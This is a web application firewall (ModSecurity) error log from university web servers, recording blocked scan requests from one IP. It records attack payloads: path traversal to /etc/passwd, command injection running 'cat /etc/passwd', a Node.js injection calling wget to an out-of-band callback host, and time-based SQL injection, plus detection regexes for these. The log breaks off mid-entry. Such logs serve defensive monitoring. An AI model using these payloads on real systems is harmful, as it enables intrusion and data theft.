[Tue Aug 29 11:31:27.350864 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:session_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:session_id: ../../../opt/trendmicro/minorityreport/etc/igsa.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/logoff.cgi"] [unique_id "ZO10n8Co-f0AAAP@My4AAAAZ"]
[Tue Aug 29 11:31:27.409238 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:bsh.script: exec(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/bsh.servlet.BshServlet"] [unique_id "ZO10n8Co-f0AAAN@5FMAAAAO"]
[Tue Aug 29 11:31:27.409564 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:session_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:session_id: ../../../opt/trendmicro/minorityreport/etc/igsa.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/logoff.cgi"] [unique_id "ZO10n8Co-f0AAAPDn6cAAAAP"]
[Tue Aug 29 11:31:27.443283 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:session_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:session_id: ../../../opt/trendmicro/minorityreport/etc/igsa.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/logoff.cgi"] [unique_id "ZO10n8Co-f0AAAQJWs8AAAAr"]
[Tue Aug 29 11:31:27.575821 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:settings[view options][outputFunctionName]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:settings[view options][outputFunctionName]: x;process.mainModule.require('child_process').execSync('wget http:/cjmn8l5jmimk2adbbnlg3eant8q9ownea.oast.site');s"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/page"] [unique_id "ZO10n8Co-f0AAAQTKHcAAAA1"]
[Tue Aug 29 11:31:27.624868 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:bsh.script: exec(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/bsh.servlet.BshServlet"] [unique_id "ZO10n8Co-f0AAAQQylIAAAAy"]
[Tue Aug 29 11:31:27.628595 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:bsh.script: exec(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/bsh.servlet.BshServlet"] [unique_id "ZO10n8Co-f0AAAQA-9cAAAAi"]
[Tue Aug 29 11:31:27.634224 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:bsh.script: exec(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/bsh.servlet.BshServlet"] [unique_id "ZO10n8Co-f0AAAO88B0AAAAF"]
[Tue Aug 29 11:31:28.407316 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:bsh.script: exec(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/bsh.servlet.BshServlet"] [unique_id "ZO10oMCo-f0AAAQSWL4AAAA0"]
[Tue Aug 29 11:31:28.586055 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:session_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:session_id: ../../../opt/trendmicro/minorityreport/etc/igsa.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/logoff.cgi"] [unique_id "ZO10oMCo-f0AAAO88B8AAAAF"]
[Tue Aug 29 11:31:28.642225 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:bsh.script: exec(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bsh.servlet.BshServlet"] [unique_id "ZO10oMCo-f0AAAP6NNoAAAAQ"]
[Tue Aug 29 11:31:29.134480 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../../../etc/passwd\\x5c0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZO10ocCo-f0AAAQSWMAAAAA0"]
[Tue Aug 29 11:31:29.137102 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../../../etc/passwd\\x5c0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZO10ocCo-f0AAAQEGIgAAAAm"]
[Tue Aug 29 11:31:29.155240 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../../../etc/passwd\\x5c0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZO10ocCo-f0AAAQQylYAAAAy"]
[Tue Aug 29 11:31:29.212417 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../../../etc/passwd\\x5c0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZO10ocCo-f0AAAP5mIwAAAAM"]
[Tue Aug 29 11:31:29.313033 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../../../etc/passwd\\x5c0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZO10ocCo-f0AAAP5mI0AAAAM"]
[Tue Aug 29 11:31:29.320340 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../../../etc/passwd\\x5c0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZO10ocCo-f0AAAQMrq4AAAAu"]
[Tue Aug 29 11:31:29.425438 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:opt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:opt: (cat/etc/passwd)>dtoa.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/include/exportUser.php"] [unique_id "ZO10ocCo-f0AAAQMrrAAAAAu"]
[Tue Aug 29 11:31:29.428634 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:opt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:opt: (cat/etc/passwd)>dtoa.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/include/exportUser.php"] [unique_id "ZO10ocCo-f0AAAQQylgAAAAy"]
[Tue Aug 29 11:31:29.431762 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:opt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:opt: (cat/etc/passwd)>dtoa.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/include/exportUser.php"] [unique_id "ZO10ocCo-f0AAAP@MzUAAAAZ"]
[Tue Aug 29 11:31:29.436718 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:opt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:opt: (cat/etc/passwd)>dtoa.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/include/exportUser.php"] [unique_id "ZO10ocCo-f0AAAQEGIoAAAAm"]
[Tue Aug 29 11:31:29.437682 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nx_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:nx_id: sleep(6) -- x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO10ocCo-f0AAAPahy8AAAAL"]
[Tue Aug 29 11:31:29.492742 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nx_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:nx_id: sleep(6) -- x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO10ocCo-f0AAAQR45wAAAAz"]
[Tue Aug 29 11:31:29.496645 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nx_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:nx_id: sleep(6) -- x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO10ocCo-f0AAAQNwGcAAAAv"]
[Tue Aug 29 11:31:29.524830 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:opt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:opt: (cat/etc/passwd)>dtoa.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/include/exportUser.php"] [unique_id "ZO10ocCo-f0AAAQOv2cAAAAw"]
[Tue Aug 29 11:31:29.528124 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nx_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:nx_id: sleep(6) -- x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO10ocCo-f0AAAQTKH8AAAA1"]
[Tue Aug 29 11:31:29.544262 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nx_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:nx_id: sleep(6) -- x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO10ocCo-f0AAAQOv2gAAAAw"]
[Tue Aug 29 11:31:29.552333 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'ARHJ'='ARHJ found within ARGS:id: 1' AND (SELECT 9687 FROM (SELECT(SLEEP(6)))pnac) AND 'ARHJ'='ARHJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/suppliers/view_details.php"] [unique_id "ZO10ocCo-f0AAAQNwGkAAAAv"]
[Tue Aug 29 11:31:29.582814 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'ARHJ'='ARHJ found within ARGS:id: 1' AND (SELECT 9687 FROM (SELECT(SLEEP(6)))pnac) AND 'ARHJ'='ARHJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/suppliers/view_details.php"] [unique_id "ZO10ocCo-f0AAAQR458AAAAz"]
[Tue Aug 29 11:31:29.590433 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'ARHJ'='ARHJ found within ARGS:id: 1' AND (SELECT 9687 FROM (SELECT(SLEEP(6)))pnac) AND 'ARHJ'='ARHJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/suppliers/view_details.php"] [unique_id "ZO10ocCo-f0AAAPahzUAAAAL"]
[Tue Aug 29 11:31:29.593614 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'ARHJ'='ARHJ found within ARGS:id: 1' AND (SELECT 9687 FROM (SELECT(SLEEP(6)))pnac) AND 'ARHJ'='ARHJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag 